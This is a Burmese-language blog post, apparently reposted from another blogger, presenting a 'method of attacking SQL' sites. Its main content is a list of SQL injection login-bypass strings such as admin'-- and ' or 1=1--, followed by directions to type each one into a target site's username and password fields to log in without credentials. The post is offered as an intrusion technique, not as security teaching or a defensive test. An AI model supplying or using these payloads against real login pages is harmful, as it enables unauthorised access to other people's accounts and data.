Popular Posts

picture widgetspicture widgetspicture widgetspicture widgetspicture widgetspicture widgets

SOL တိုက္ခိုက္နည္း

ကိုယ္တုိက္ခုိက္မယ့္ ဆုိက္ဒ္ဟာ SQL Server ေတာ့သုံးထားရပါမယ္ ။ ေအာက္ကကုဒ္ေတြ ကေတာ့ SQL ရဲ႕ ဆရာ့ဆရာေတြ ထြင္သြားတဲ့နည္းပါ ။ (SQL ကၽြမ္းက်င္ေသာ Programmer မ်ားကိုမဆုိလုိပါ ။ SQL ရဲ႕ vulnerable ကိုရွာႏုိင္ေသာပုဂၢဳိလ္မ်ားကိုဆုိလုိပါတယ္ ။ ) ။ ေအာက္ပါေပး ထားတဲ့နည္းကေတာ့ SQL ဆုိက္ဒ္ေတြကို ၀င္လုိ႕ရတဲ့ User Name နဲ႕ Password ေတြပါ ။ SQL Inject တစ္ခုမွ်သာျဖစ္ပါတယ္ ။

CODE:
admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

အထက္ပါ ကုဒ္ေတြကိုဘယ္လုိအသုံးခ်မလဲ ?လြယ္ပါတယ္ Inject ကုဒ္တစ္ခုခ်င္းစီကို Login ရဲ႕ UserNameနဲ႕ Password မွာ႐ိုက္ထည့္ေပးလုိက္႐ုံပဲျဖစ္ပါတယ္ ။ ေက်းဇူးတင္ပါတယ္

က်ေနာ္ သိမ္းထာတဲ့ နည္းပညာမွတ္တမ္းေတြကေန မွ်လိုက္တာပါ...
 

 

ကိုလင္း-သလႅာ၀တီ ပို႕မွ ကူးယူေဖာ္ျပသည္...

No comments:

Post a Comment

Nattalin Township

သူရိယ အလင္း - လိုင္းေပါင္းစံု

ေရာင္ေတာ္ဖြင့္လူငယ္အဖြဲ႕ လွုပ္ရွားမွု(နတ္တလင္းၿမိဳ႕)

HEART TO HEART

ဟိတကာရီ နာေရးကူညီမွုအသင္း

DoReMe

Pyithu Hluttaw - ျပည္သူ႔လႊတ္ေတာ္

ရဲဇာနည္

Eleven Media Group

Shwemyanmar media group

Health Articles

အိပ္ေရးပ်က္တဲ့ညမ်ား

ေနာက္တစ္ၾကိမ္ လာလည္ဖို႕ ဖိတ္ေခၚပါတယ္ ဆက္လက္ၾကိဳးစားေပးပါမယ္ .... တာရာ ပြႀကီး